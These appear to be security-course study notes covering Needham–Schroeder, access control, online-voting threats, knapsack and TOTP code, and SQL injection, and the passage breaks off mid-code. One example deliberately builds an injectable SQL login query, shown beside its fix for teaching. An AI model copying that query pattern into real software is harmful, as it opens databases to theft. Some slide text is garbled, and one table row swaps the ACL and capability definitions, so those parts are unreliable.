4. This protocol aims to establish a session key between two parties on a network, typically to protect further communication.
5. The Needham–Schroeder Public-Key Protocol is based on public-key cryptography.
6. This protocol is intended to provide mutual authentication between two parties communicating on a network, but in its proposed form it is insecure.
7. The symmetric protocol
Here, Alice (A) initiates the communication to Bob (B). S is a server trusted by both parties. In the communication:
   i. A and B are the identities of Alice and Bob respectively
   ii. K_AS is a symmetric key known only to A and S
   iii. K_BS is a symmetric key known only to B and S
   iv. N_A and N_B are nonces generated by A and B respectively
   v. K_AB is a symmetric, generated key, which will be the session key of the session between A and B
The protocol can be specified as follows in security protocol notation:

A → S : A, B, N_A
Alice sends a message to the server identifying herself and Bob, telling the server she wants to communicate with Bob.

S → A : {N_A, K_AB, B, {K_AB, A}K_BS}K_AS
The server generates K_AB and sends back to Alice a copy encrypted under K_BS for Alice to forward to Bob, and also a copy for Alice. Since Alice may be requesting keys for several different people, the nonce assures Alice that the message is fresh and that the server is replying to that particular message, and the inclusion of Bob's name tells Alice who she is to share this key with.

A → B : {K_AB, A}K_BS
Alice forwards the key to Bob, who can decrypt it with the key he shares with the server, thus authenticating the data.

B → A : {N_B}K_AB
Bob sends Alice a nonce encrypted under K_AB to show that he has the key.

A → B : {N_B - 1}K_AB
Alice performs a simple operation on the nonce, re-encrypts it and sends it back, verifying that she is still alive and that she holds the key.

8. Attacks on the protocol
The protocol is vulnerable to a replay attack (as identified by Denning and Sacco). If an attacker uses an older, compromised value for K_AB, he can then replay the message {K_AB, A}K_BS to Bob, who will accept it, being unable to tell that the key is not fresh.

9. Fixing the attack
This flaw is fixed in the Kerberos protocol by the inclusion of a timestamp. It can also be fixed with the use of nonces as described below. At the beginning of the protocol:

A → B : A
Alice sends Bob a request.

B → A : {A, N'_B}K_BS
Bob responds with a nonce encrypted under his key with the server.

A → S : A, B, N_A, {A, N'_B}K_BS
Alice sends a message to the server identifying herself and Bob, telling the server she wants to communicate with Bob.

S → A : {N_A, K_AB, B, {K_AB, A, N'_B}K_BS}K_AS
Note the inclusion of the nonce.

The protocol then continues through the final three steps as described in the original protocol above. Note that N'_B is a different nonce from N_B. The inclusion of this new nonce prevents the replaying of a compromised version of {K_AB, A}K_BS, since such a message would need to be of the form {K_AB, A, N'_B}K_BS, which the attacker can't forge since she does not have K_BS.

10. The public-key protocol
This assumes the use of a public-key encryption algorithm.
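As an added example (not code from these notes), the following Python model runs the symmetric protocol with the nonce fix from items 7-9 above: a trusted server S, an initiator A and a responder B exchange the seven messages, and B refuses a replayed ticket {K_AB, A, N'_B}K_BS that does not carry its currently outstanding N'_B. The toy encryption used for {m}K, the key names and the message field names are constructed for this example only.

```python
import hashlib
import hmac
import json
import os
import secrets

# Constructed toy authenticated encryption standing in for {m}K; a real deployment would use
# an AEAD such as AES-GCM. It exists only so this script runs offline with the stdlib.
def _subkey(key: bytes, label: bytes) -> bytes:
    return hashlib.sha256(label + key).digest()

def _keystream(key: bytes, iv: bytes, n: int) -> bytes:
    k = _subkey(key, b"enc")
    return b"".join(hashlib.sha256(k + iv + i.to_bytes(4, "big")).digest()
                    for i in range(n // 32 + 1))[:n]

def seal(key: bytes, msg) -> dict:
    """{msg}K: JSON-encode msg, XOR with a keystream, then HMAC the result (encrypt-then-MAC)."""
    plain = json.dumps(msg, sort_keys=True).encode()
    iv = os.urandom(16)
    ct = bytes(p ^ s for p, s in zip(plain, _keystream(key, iv, len(plain))))
    tag = hmac.new(_subkey(key, b"mac"), iv + ct, hashlib.sha256).digest()
    return {"iv": iv.hex(), "ct": ct.hex(), "tag": tag.hex()}

def unseal(key: bytes, box: dict):
    """Inverse of seal; raises ValueError unless box was sealed under this exact key."""
    iv, ct, tag = (bytes.fromhex(box[k]) for k in ("iv", "ct", "tag"))
    expect = hmac.new(_subkey(key, b"mac"), iv + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expect, tag):
        raise ValueError("bad tag: wrong key or tampered message")
    return json.loads(bytes(c ^ s for c, s in zip(ct, _keystream(key, iv, len(ct)))))

class Server:
    """S: knows K_AS and K_BS; answers message 3 with message 4 of the fixed protocol."""
    def __init__(self, long_term_keys: dict):
        self.keys = long_term_keys

    def issue(self, a: str, b: str, n_a: str, bob_box: dict) -> dict:
        inner = unseal(self.keys[b], bob_box)        # {A, N'_B}K_BS: only S and B can read it
        if inner["for"] != a:
            raise ValueError("N'_B was issued for a different initiator")
        k_ab = os.urandom(32).hex()
        ticket = seal(self.keys[b], {"key": k_ab, "from": a, "n_b2": inner["nonce"]})
        return seal(self.keys[a], {"n_a": n_a, "key": k_ab, "peer": b, "ticket": ticket})

class Responder:
    """B: remembers the outstanding N'_B so a stale {K_AB, A, N'_B}K_BS is refused."""
    def __init__(self, name: str, k_bs: bytes):
        self.name, self.k_bs = name, k_bs
        self.pending = {}          # initiator -> N'_B that has not yet been consumed
        self.session_key = self.n_b = None

    def challenge(self, a: str) -> dict:          # message 2: B -> A : {A, N'_B}K_BS
        self.pending[a] = secrets.token_hex(16)
        return seal(self.k_bs, {"for": a, "nonce": self.pending[a]})

    def accept_ticket(self, ticket: dict) -> dict:  # message 5 in, message 6 {N_B}K_AB out
        t = unseal(self.k_bs, ticket)
        if self.pending.get(t["from"]) != t["n_b2"]:
            raise ValueError("ticket lacks the outstanding N'_B: replay or stale key")
        del self.pending[t["from"]]                 # each N'_B admits exactly one ticket
        self.session_key = bytes.fromhex(t["key"])
        self.n_b = secrets.randbelow(2 ** 62) + 1
        return seal(self.session_key, {"n_b": self.n_b})

    def verify(self, box: dict) -> bool:          # message 7 must carry N_B - 1 under K_AB
        return unseal(self.session_key, box)["n_b_minus_1"] == self.n_b - 1

class Initiator:
    """A: drives one run; keeps the last ticket only so the demo can try replaying it."""
    def __init__(self, name: str, k_as: bytes):
        self.name, self.k_as = name, k_as
        self.session_key = self.last_ticket = None

    def run(self, bob: Responder, server: Server) -> bool:
        bob_box = bob.challenge(self.name)                                   # messages 1, 2
        n_a = secrets.token_hex(16)
        reply = unseal(self.k_as, server.issue(self.name, bob.name, n_a, bob_box))  # 3, 4
        if reply["n_a"] != n_a or reply["peer"] != bob.name:
            raise ValueError("server reply is not fresh or names the wrong peer")
        self.session_key, self.last_ticket = bytes.fromhex(reply["key"]), reply["ticket"]
        chal = unseal(self.session_key, bob.accept_ticket(reply["ticket"]))  # 5, 6
        return bob.verify(seal(self.session_key, {"n_b_minus_1": chal["n_b"] - 1}))  # 7

def demo() -> dict:
    """One honest run, then the Denning-Sacco replay of the old ticket against a fresh N'_B."""
    k_as, k_bs = os.urandom(32), os.urandom(32)
    server, alice, bob = Server({"A": k_as, "B": k_bs}), Initiator("A", k_as), Responder("B", k_bs)
    authenticated = alice.run(bob, server)
    keys_agree = alice.session_key == bob.session_key
    bob.challenge("A")                        # next run begins: Bob issues a new N'_B
    try:
        bob.accept_ticket(alice.last_ticket)  # the old ticket no longer carries that nonce
        replay_rejected = False
    except ValueError:
        replay_rejected = True
    return {"authenticated": authenticated, "keys_agree": keys_agree, "replay_rejected": replay_rejected}
```

Calling demo() returns all three flags True: the honest run authenticates and both sides hold the same K_AB, while the replayed ticket is rejected because Bob's outstanding N'_B has changed.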
  • 7. Here, Alice (A) and Bob (B) use a trusted server (S) to distribute public keys on request. These keys are: i. KPA and KSAKPA and KSA, respectively public and private halves of an encryption key- pair belonging to A (S stands for "secret key" here) ii. KPB and KSBKPB and KSB, similar belonging to B iii. KPSKPS and KSSKSS, similar belonging to S. (Note this has the property that KSSKSS is used to encrypt and KPSKPS to decrypt). Difference between access control list and capability list. 5M No. Access control list Capability list 1 An access control list is a table that tells a computer operating system which access rights each user has to a particular system object, such as a file directory or individual file. A capability list is a token, ticket, or key that gives the possessor permission to access an entity or object in a computer system. 2 Access control list can attemptto name any objectinthe systemas the target of an operation. In capability list a usercan onlyname those objectsforwhicha capabilityisheld. 3 Access control list is based on users. Capability list is based on process. 4 Access control list consists of tokens, tickets and keys that give permission to give access. Capability list consists addresses or names of the devices to which permission should give. 5 Access control list allows deleting a user from list. Capability list does not allows to delete user. Consider an online voting System. People will cast their votes through the internet. For this system identify vulnerability, threat and attack. 5M Vulnerability: Common vulnerability in online voting system are: 1. Denial-of-service attack against the voting process. If a client sends an HTTP request containing unexpected header fields, the server logs the field names to disk. By sending many specially crafted requests containing fields with very long names, an attacker can exhaust the server’s log storage, after which it will fail to accept any new votes. 
Curiously, the vulnerable code is only a few lines from the comment "Don't write to disk; we don't know how large the value is." This indicates that the developers were aware of similar attacks but failed to account for all variants: the header value was kept off disk, the header name was not.
2. A second problem found in the same system is a shell-injection vulnerability in a server-side user interface that is intended to allow operators to perform pre-determined administrative tasks. The vulnerability would allow such an operator to execute arbitrary shell commands on the
• 8. election servers with root privileges. Under current procedures this is moot, since the same workers already perform other administrative tasks at the command line as root.
3. Reliability of software and hardware. Software and devices can still fail in use: repeated use sometimes produces errors in the tally of votes, and hardware such as network equipment is sometimes unable to respond quickly enough.
4. Human factors. Election officials sometimes do not understand how to operate the technology used in the election correctly, and voters who have never voted with the e-voting system, or who do not know their own constituency, make mistakes in the process, resulting in many failures to select the intended candidate.
Threats: Internet voting systems face numerous security threats.
1. Denial of service: a common threat; it occurs while the internet election is in progress, when loss of availability has the greatest impact.
2. Trojan horse or spyware on the voter's machine that changes or monitors votes: the possibility of vote theft and loss of privacy.
3. Automated vote buying: software on the voter's machine that can prove to a buyer how a vote was cast makes selling votes practical at scale.
4. Insider attack on the voting system: insider attacks are common in commercial settings, and a voting system is no exception.
5. Virus specific to the Internet voting system: vote theft, privacy loss, disenfranchisement, compromise of the election.
6. Spoofing (of the voting site, of the voter, or of network addresses): easy and common, and it can be launched from anywhere.
Attacks:
1. Denial of Service (DoS) attacks have devastating consequences and in most cases severely affect the ability to keep the system available. The following two methods show how an attacker may compromise the availability of a voting system.
A. Ping of Death
The ping of death relies on a flaw in some Transmission Control Protocol/Internet Protocol (TCP/IP) stack implementations.
The attack relates to the handling of unusually and illegally large ping (ICMP echo) packets: an IP datagram larger than the maximum of 65,535 bytes, delivered in fragments. Remote systems receiving such packets can crash because the buffer allocated for reassembling the packet overflows. The attack does not affect all systems in the same way: some systems crash, while others remain unaffected (modern stacks check the reassembled length).
• 9. B. Packet Flooding
Packet flooding exploits the fact that establishing a connection with the TCP protocol involves a three-phase handshake between the systems. In a SYN flooding attack, an attacking host sends many connection requests (SYN packets) and never responds to the receiving host's SYN-ACK with the final acknowledgment. As the receiving host waits for more and more acknowledgments, its queue of half-open connections fills up. Ultimately, the receiving machine can no longer accept legitimate connections.
2. A computer virus is a computer program that can reproduce itself and may cause undesired effects on computers where it is active. To do its malicious work, the virus needs to be executed. Usually viruses attach themselves to other code that is likely to be executed by a user. As long as the virus is active on the computer, it can copy itself to other files or disks when they are used. Viruses could destroy e-voting systems. This could compromise availability at election time, forcing governments and institutions to perform re-elections.
3. A worm is self-contained malicious code that does not need to modify an existing program or file to spread itself. Instead, it makes copies of itself on an infected computer and spreads over the network to become active on other systems. Some worms carry a destructive payload, for example overwriting portions of files with random data; such damage is not repairable, so files may need reinstallation or restoring from a backup. A worm programmed to do so could overwrite files and change vote records, bringing the integrity of the votes into question.
4. Trojan horses are programs that appear useful or harmless but carry hidden malicious code; they typically arrive as downloads while the victim is connected to the internet. A Trojan may delete or modify an important file on the computer, plant a harmful virus, or even steal the user's passwords. This makes all sorts of fraudulent schemes possible.
Once inside a computer the Trojan horse can access passwords, screen names and other personal information and then send this confidential data to the attacker. Trojan horses represent an immense threat to the confidentiality and integrity of information in e-voting systems.
5. Numerous physical attacks can be carried out on an e-voting system to sabotage an election. Vandalism of e-voting systems would make them inoperable on the day of the election. Saboteurs could remove network connections and pull plugs out of e-voting systems, causing votes to be lost. Attackers may remove hard drives or smart cards, replacing them with falsified data. E-voting machines could be stolen, giving attackers access to sensitive voting information about users.

Distinguish between attack and vulnerability. 5M
No. | Attack | Vulnerability
1 | An attack is an act or event that harms a computer system. | A vulnerability is a flaw or weakness in a computer system that an attack can exploit.
2 | An attack is an intentional act to damage or gain control of a system. | A vulnerability is unintentional; it could exist in system design, business operations, installed software or network configuration.
• 10.
3 | An attack can be active (modifying data or service) or passive (eavesdropping). | A vulnerability can be a hardware, software or network vulnerability.
4 | An attack can come from outside or inside the network. | A vulnerability is an internal property of the system.
5 | Examples: cross-site scripting, SQL injection, viruses, etc. | Examples: buffer overflow, race conditions, etc.

Difference between symmetric and asymmetric cryptography. 5M
No. | Symmetric cryptography | Asymmetric cryptography
1 | Symmetric encryption requires a single secret key known only to the authorized parties. | Asymmetric encryption uses a pair of keys, a public key and a private key.
2 | Symmetric encryption uses the same key for both encryption and decryption. | Asymmetric encryption uses one key for encryption and the other key for decryption.
3 | The most commonly used symmetric encryption algorithms include DES, 3DES, AES and RC4 (DES and RC4 are now considered broken and should not be used in new systems). | The most common asymmetric encryption algorithm is RSA; elliptic-curve schemes (ECDH, ECDSA) are also widely used.
4 | Symmetric key algorithms are faster than asymmetric key algorithms. | Asymmetric key algorithms are slower than symmetric key algorithms.
5 | Symmetric encryption is used for bulk data transmission. | Asymmetric encryption is used for securely exchanging secret keys and for digital signatures.

Knapsack cryptosystem. 5M
1. The knapsack cryptosystem (Merkle-Hellman) is an asymmetric-key cryptosystem. It is of historical interest: Shamir broke the basic scheme in 1982, so it is not used in practice.
2. It requires two keys for communication: a public key and a private key.
3. The public key is used for encryption and the private key for decryption.
4. The knapsack problem is also called the rucksack problem.
5. The knapsack problem is a problem in combinatorial optimization.
6. The knapsack problem states: given a set of items, each with a weight and a value, determine which items to include in a collection so that the total weight is less than or equal to a given limit and the total value is as large as possible. The cryptosystem uses the subset-sum special case: given weights S_1..S_n and a target T, find the subset whose weights sum to exactly T.
7. There are two versions of the knapsack problem:
A. 0/1 knapsack problem: items are indivisible in this version.
You can either take an item or not. The general problem is NP-hard, but special instances can be solved easily: some with dynamic programming, and superincreasing sequences (each S_i larger than the sum of all previous ones) by a simple greedy scan. The cryptosystem relies on this gap between the easy and the hard instances.
• 11. B. Fractional knapsack problem: items are divisible in this version. You can take any fraction of an item (this version is solved greedily and is not used in cryptography).
8. Algorithm for the knapsack sum (given the sequence S[1..n] and the selection bits X[1..n], compute the total):
KnapsackSum(S[1..n], X[1..n])
{
  T ← 0
  for i = 1 to n
  {
    T ← T + S_i * X_i
  }
  return T
}
9. Inverse algorithm (given the total T and a superincreasing sequence S[1..n], recover the selection bits; it scans from the largest element down and subtracts each element it takes):
Inverse_KnapsackSum(T, S[1..n])
{
  for i = n down to 1
  {
    if T ≥ S_i
    {
      X_i ← 1
      T ← T − S_i
    }
    else
      X_i ← 0
  }
  return X[1..n]
}
10. The knapsack cryptosystem includes the following processes:
A. Generation of keys
B. Encryption process
C. Decryption process
11. Generation of keys: choose a superincreasing private sequence S, a modulus q larger than the sum of S, and a multiplier r coprime to q. The public key is the sequence P_i = r * S_i mod q, which is no longer superincreasing; the private key is (S, q, r).
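The key generation step above and the encryption and decryption steps that follow, carried through in running code. This is an added example, not code from the slides: a Merkle-Hellman implementation built on the KnapsackSum and Inverse_KnapsackSum routines of steps 8 and 9, with one byte per 8-element block. The parameter sizes and the byte-to-bits mapping are this example's own choices.

```python
"""Merkle-Hellman knapsack cryptosystem: key generation (step 11), encryption
(step 12) and decryption (step 13), using the KnapsackSum and
Inverse_KnapsackSum routines of steps 8 and 9.

Added example, not code from the slides.  Parameters are tiny and the scheme
itself was broken by Shamir in 1982, so this is for study only."""
import math
import random


def knapsack_sum(s, x):
    """Step 8: T = sum of S_i * X_i."""
    return sum(si * xi for si, xi in zip(s, x))


def inverse_knapsack_sum(t, s):
    """Step 9: recover X from T; correct only when s is superincreasing."""
    x = [0] * len(s)
    for i in range(len(s) - 1, -1, -1):     # largest element first
        if t >= s[i]:
            x[i] = 1
            t -= s[i]
    if t != 0:
        raise ValueError("T is not a subset sum of S")
    return x


def is_subset_sum(t, s) -> bool:
    try:
        inverse_knapsack_sum(t, s)
        return True
    except ValueError:
        return False


def is_superincreasing(s) -> bool:
    total = 0
    for v in s:
        if v <= total:
            return False
        total += v
    return True


def keygen(n=8, seed=None):
    """Private key: superincreasing S, modulus q > sum(S), multiplier r with
    gcd(r, q) = 1.  Public key: P_i = r * S_i mod q, which hides the structure."""
    rng = random.Random(seed)
    s, total = [], 0
    for _ in range(n):
        v = total + rng.randint(1, total + 1)   # strictly larger than the sum so far
        s.append(v)
        total += v
    q = total + rng.randint(1, total)
    r = rng.randrange(2, q)
    while math.gcd(r, q) != 1:
        r = rng.randrange(2, q)
    public = [(r * v) % q for v in s]
    return public, (s, q, r)


def encrypt(public, data: bytes):
    """Step 12: each byte is an 8-bit block X; the ciphertext is C = KnapsackSum(P, X)."""
    assert len(public) == 8, "this demo encrypts one byte per block"
    return [knapsack_sum(public, [(byte >> i) & 1 for i in range(8)]) for byte in data]


def decrypt(private, cipher):
    """Step 13: T = r^-1 * C mod q turns C back into a sum over S; then invert."""
    s, q, r = private
    r_inv = pow(r, -1, q)
    out = bytearray()
    for c in cipher:
        x = inverse_knapsack_sum((c * r_inv) % q, s)
        out.append(sum(bit << i for i, bit in enumerate(x)))
    return bytes(out)


if __name__ == "__main__":
    pub, priv = keygen(8, seed=7)
    c = encrypt(pub, b"knapsack")
    print("public key:", pub)
    print("ciphertext blocks:", c)
    print("decrypted:", decrypt(priv, c))
```

Decryption works because every block sum is below q: C = r * (sum of S_i X_i) mod q, so multiplying by r^-1 gives the sum over the superincreasing S exactly, and the greedy scan of step 9 then succeeds. The public sequence has no such structure, which is what the scheme relied on for security.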
• 12. 12. Encryption process: encryption of the message using the knapsack algorithm. The plaintext is split into n-bit blocks X[1..n] and each block is encrypted as the sum C = KnapsackSum(P, X) over the public sequence P. It converts plaintext into ciphertext.
13. Decryption process: decryption of the message using the inverse knapsack algorithm. The receiver computes T = r^-1 * C mod q, which turns the sum back into a sum over the superincreasing private sequence S, and then recovers X with Inverse_KnapsackSum(T, S). It converts ciphertext into plaintext.

What are the different modes of authenticating a user?
Different modes of authenticating a user:
1. Computer recognition software:
i. This authentication factor is accomplished by installing a small authentication software plug-in that places a cryptographic device marker onto the consumer's computer.
ii. It can then be verified as a second factor during the authentication process.
iii. The authentication process then includes two factors: the password and the device marker on the consumer's computer.
iv. Because the device marker is always on the consumer's computer, the user only has to enter their username and password to log in.
2. Biometrics:
i. Biometric authentication is verification of a physical characteristic, such as a fingerprint or an iris pattern, using a hardware reader.
ii. Offering biometric authentication for consumer online banking has significant challenges, including distribution of biometric readers and the associated cost per user.
iii. A fingerprint scan is an example of biometric authentication.
iv. Face recognition is another biometric authentication technique.
3. E-mail or SMS one-time password (OTP):
i. E-mail or SMS OTP is based on sending a second, one-time-use password to a registered e-mail address or mobile phone.
ii. The user must then input that one-time password in addition to their normal password to authenticate to the online bank.
iii. This method is not generally used for everyday logins.
• 13. iv. Because there is a time lag before users receive the OTP they need to log in, it is seldom used for everyday logins; it is often used for the initial enrollment, before another form of authentication is provisioned. (SMS delivery can also be intercepted, for example by SIM swapping, so SMS OTP is weaker than a token.)
4. One-time password (OTP) token:
i. An OTP token provides users with a hardware device that generates a constantly changing second password, which must be entered into the online banking web site in addition to the normal password.
ii. OTP tokens require the user to carry the token with them to log in to the bank web site.
iii. If a customer has multiple banks that require OTP tokens, the user must carry multiple tokens unless the banks integrate their systems to accept a single token.
iv. OTP tokens are mostly used for bank transactions.
5. Out of band:
i. Out-of-band verification involves the bank calling a registered phone number and requesting that the user enter their password over the phone before the user is allowed to log in.
ii. This is similar to e-mail or SMS OTPs.
iii. This requirement introduces a time lag and requires that the user be at the location of the registered phone number.
6. Peripheral device recognition:
i. Peripheral device recognition is accomplished by placing a cryptographic device marker on a device the user already owns, such as a USB flash drive or a smartphone memory card.
ii. This can be a good alternative to the OTP token,
iii. because it provides a hardware-based second factor but does not require the user to carry an additional device.
iv. In addition, device markers from multiple banks can reside on a single hardware device without requiring the various banks to integrate their systems.
7. Scratch-off card:
i. A scratch-off card contains several PINs that the user scratches off and uses only once each to log in.
ii. This is a lower-cost one-time-password option than tokens.
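The "constantly changing second password" of mode 4 is normally produced by the HOTP/TOTP algorithms (RFC 4226 and RFC 6238), which the slides describe but do not show. The following is an added example, not code from the slides: a standard-library HOTP/TOTP implementation plus the server-side check a bank would run, which tolerates one 30-second step of clock drift and refuses to accept the same code twice. The secret used in the demonstration is the RFC test-vector key, not a real credential, and the helper names are this example's own.

```python
"""HOTP (RFC 4226) and TOTP (RFC 6238), the algorithms behind OTP tokens and
authenticator apps (mode 4 above), with a server-side verifier that tolerates
one time step of clock drift and rejects reuse of a code.

Added example, not code from the slides; standard library only.  The
constructed secret below is the RFC test-vector key, not a real credential."""
import base64
import hashlib
import hmac
import secrets
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-SHA1 over the 8-byte big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: int = None, step: int = 30, digits: int = 6) -> str:
    """TOTP is HOTP with counter = floor(unix_time / step)."""
    at = int(time.time()) if at is None else at
    return hotp(secret, at // step, digits)


def verify_totp(secret, code, at=None, step=30, digits=6, window=1, last_counter=-1):
    """Accept the code for the current step or +/- `window` steps, but never for
    a step at or below `last_counter` (stops replay of an already used code).
    Returns (ok, counter_to_store_for_this_user)."""
    at = int(time.time()) if at is None else at
    base = at // step
    for drift in range(-window, window + 1):
        counter = base + drift
        if counter <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, counter, digits), code):
            return True, counter
    return False, last_counter


def new_shared_secret() -> str:
    """Enrolment: a 160-bit random secret, base32-encoded as shown in a QR code."""
    return base64.b32encode(secrets.token_bytes(20)).decode()


# Constructed secret: the RFC 4226 / RFC 6238 test key "12345678901234567890".
RFC_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    print("HOTP(counter=0) =", hotp(RFC_SECRET, 0))                  # RFC 4226: 755224
    print("TOTP(t=59, 8 digits) =", totp(RFC_SECRET, 59, digits=8))  # RFC 6238: 94287082
    ok, last = verify_totp(RFC_SECRET, totp(RFC_SECRET, 59), at=59)
    replay, _ = verify_totp(RFC_SECRET, totp(RFC_SECRET, 59), at=59, last_counter=last)
    print("first use accepted:", ok, "| replay accepted:", replay)
```

The server must store `last_counter` per user after each successful check; without it, a code sniffed during its 30-second window (plus the drift window) can be replayed. The same drift window is why the slides' "time lag" objection to e-mail and SMS OTPs does not apply here: the code is computed locally from time and the shared secret, not delivered.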
• 14. Difference between discretionary access control and mandatory access control: 5M
No. | Discretionary access control | Mandatory access control
1 | In discretionary access control (DAC), the owner of an object specifies which subjects can access the object. | In mandatory access control (MAC), the system (its security policy) specifies which subjects can access which data objects.
2 | Discretionary access control is based on the discretion of the owner. | Mandatory access control is based on security labels (classifications of objects and clearances of subjects) assigned by the administrator.
3 | The default file permissions of operating systems such as Windows, Linux and macOS are discretionary. | Mandatory access control is used in military and government institutions, and is available in general-purpose systems through extensions such as SELinux and AppArmor.
4 | Access rights are scattered across many owners, so it is harder to establish and verify a consistent policy for the whole system. | Access rights follow from centrally assigned labels, so it is easier to establish and audit a system-wide policy.
5 | Discretionary access control is more flexible than mandatory access control. | Mandatory access control is less flexible than discretionary access control.
6 | Discretionary access control is more labour intensive for users, who must manage permissions themselves. | Mandatory access control is less labour intensive for users, since the system enforces the labels.
7 | Access can be granted by ordinary users (owners). | Access can only be changed or granted by the administrator through the policy, not by the owner of the data.

Software reverse engineering 5M
1. Software reverse engineering (SRE) is the practice of analysing a software system, or a part of it, to understand how it works without access to its design or source.
2. Reverse engineering skills are also used to detect and neutralise viruses and malware and to protect intellectual property.
3. The process of taking a software program's binary code and analysing it to recover a representation close to the original source code is called software reverse engineering.
4. Software reverse engineering involves translating a program's machine code back into assembly or higher-level program statements.
5.
Software reverse engineering is widely used in computer hardware and software to understand and enhance product features and to fix certain bugs.
6. Reverse engineering is the reverse of compilation: it recovers a higher-level representation (assembly, control flow, or approximate source) from low-level code without changing the original program's behaviour.
7. It is similar to disassembling the parts of a vehicle to understand the basic functioning of the machine and its internal parts, and then making appropriate adjustments for better performance.
• 15. 8. Reverse engineering is taking apart an object to see how it works in order to duplicate or enhance it.
9. Reverse engineering can be applied to several parts of the software or hardware development activities and conveys a different meaning in each.
10. There are two situations. In the first, the source code is available but the high-level design (architecture, documentation) is not; the effort to recover that design from the code is called reverse engineering (design recovery).
11. In the second, the source code is not available at all, and the process of recovering a possible source from the binary is called reverse engineering.
12. To avoid copyright infringement, reverse engineering uses the clean-room design technique: one team documents the observed behaviour, and a separate team that has never seen the original code re-implements it from that specification.
13. The main purposes of reverse engineering:
i. Audit the security of a product
ii. Analyse (or remove) copy protection
iii. Customise embedded systems
iv. Include additional features
14. Reverse engineering is used in many fields such as software design, software testing and software programming.
15. In software design, reverse engineering enables the developer or programmer to add new features to existing software with or without the source code. Different techniques are used to add new features to the software.
16. Reverse engineering helps analysts study virus code and other malware.
17. One purpose of reverse engineering is to make a system more robust, so as to protect it from spyware and attackers, by finding its weaknesses before they do.
18. The process of reverse engineering uses tools to analyse software and determine its components.
19. Tools used in software reverse engineering:
• 16. i. Disassemblers: a disassembler converts binary machine code into assembly code and extracts strings, functions, imported libraries, etc. It converts the machine language into a format a human can read (for example IDA, Ghidra or objdump).
ii. Debuggers: a debugger expands the functionality of a disassembler by showing the CPU registers, a hex dump of memory, the stack, and so on, at run time. Using a debugger, the reverser can set breakpoints, step through the code one instruction at a time, and modify registers or memory to investigate the results (for example gdb, x64dbg or WinDbg).
iii. Hex editors: these allow the raw bytes of a binary to be viewed and changed as required. There are different hex editors with different functions.
iv. PE and resource viewers: a Windows executable is stored in the Portable Executable (PE) format, whose headers tell the loader how to set up and initialise the program. A PE viewer shows the sections, the imported DLLs and functions, the exports and the embedded resources, which is often the fastest way to learn what an unknown program does.
20. Reverse engineering has developed a positive role in creating descriptive data sets (documentation) of the original object.
21. There are many applications used for reverse engineering.
22. With the development of many kinds of devices, reverse engineering software enables programmers to turn raw binary data into a useful form.
23. Reverse engineering is also beneficial for businesses and owners who want to incorporate advanced features into their software to meet the demands of growing markets.

What are the different phases of a virus? Explain. 5M
Different phases of a virus:
i. Dormant phase
ii. Propagation phase
iii. Triggering phase
iv. Execution phase
i. Dormant phase:
• 17. 1. The virus remains idle.
2. It is activated by a certain action or event.
3. Examples of activation events are a user pressing a key, or a certain date and time being reached. Not all viruses have a dormant phase.
ii. Propagation phase:
1. The virus starts propagating, that is, multiplying itself.
2. A piece of code copies itself, and each copy starts making more copies of itself, thus propagating.
3. The virus places its copies into other programs or into system areas of the disk.
iii. Triggering phase:
1. A dormant virus moves into this phase when it gets activated, that is, when the event it was waiting for occurs.
2. The virus is activated to perform the function for which it was intended.
3. The trigger can be any of a variety of system events, including a count of how many times the virus has copied itself.
iv. Execution phase:
1. This is the actual work of the virus.
2. In this phase the virus's payload is performed.
3. The payload can be destructive (deleting files) or harmless (displaying a message).

Define with examples i) SQL injection ii) Cross-site scripting. 5M
i. SQL injection:
1. SQL injection is an attack that sends malicious SQL through an application's inputs in order to read or modify its database.
2. SQL injection is a code-injection technique that exploits a flaw in the way a database application builds its queries.
3. SQL injection vulnerabilities occur when user input is concatenated into a query without being validated or parameterised.
4. SQL injection is one of the most common application-layer attack techniques used for extracting valuable data from databases.
• 18. 5. SQL injection attack variants:
i. Incorrectly filtered escape characters
ii. Incorrect type handling
iii. Vulnerabilities in the database server
iv. Blind SQL injection
v. Conditional responses
vi. Conditional errors
vii. Time delays
6. Incorrectly filtered escape characters: occurs when user input is not properly filtered for escape characters (such as a single quote) before being placed in an SQL statement, so the attacker can end the intended string and append their own SQL.
7. Incorrect type handling: occurs when a data field is not strongly typed or not checked for type constraints, for example a numeric parameter that is placed into the query as unquoted text.
8. Vulnerabilities in the database server: occur due to bugs in the server software itself, for example in built-in functions.
9. Blind SQL injection: used when a web application is vulnerable to SQL injection but the results of the query are not visible to the attacker; the attacker asks true/false questions and observes the application's behaviour.
10. Conditional responses: the attacker makes the query evaluate a logical statement and infers the answer from the ordinary application page (for example, whether a record is shown or not).
11. Conditional errors: a type of blind SQL injection where the injected statement causes a database error only when a condition is true.
12. Time delays: a type of blind SQL injection where the injected statement makes the query pause (for example with SLEEP or WAITFOR DELAY) only when a condition is true, so the attacker infers the answer from the response time.
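The question asks for examples, so here is one for SQL injection (variants 6, 9 and 10 above) and one for the cross-site scripting section that follows, each as the vulnerable code beside its fix. This is an added example, not code from the slides: the user table is constructed in an in-memory sqlite3 database, the "login" and "greet" functions stand in for web handlers, and the payload strings are this example's own.

```python
"""SQL injection (unfiltered quote; blind injection with conditional
responses) and cross-site scripting, vulnerable code beside the fix.

Added example, not code from the slides.  The user table is constructed
in memory with sqlite3; the login/greet functions stand in for web handlers."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, pw TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return db


def login_vulnerable(db, name: str, pw: str):
    # Variant 6: the single quote in `name` is not escaped, so user input
    # becomes part of the SQL text and can change the query's meaning.
    query = f"SELECT role FROM users WHERE name = '{name}' AND pw = '{pw}'"
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(db, name: str, pw: str):
    # Parameterised query: the driver passes the values separately from the
    # SQL, so a quote in the input can never terminate the string literal.
    row = db.execute("SELECT role FROM users WHERE name = ? AND pw = ?",
                     (name, pw)).fetchone()
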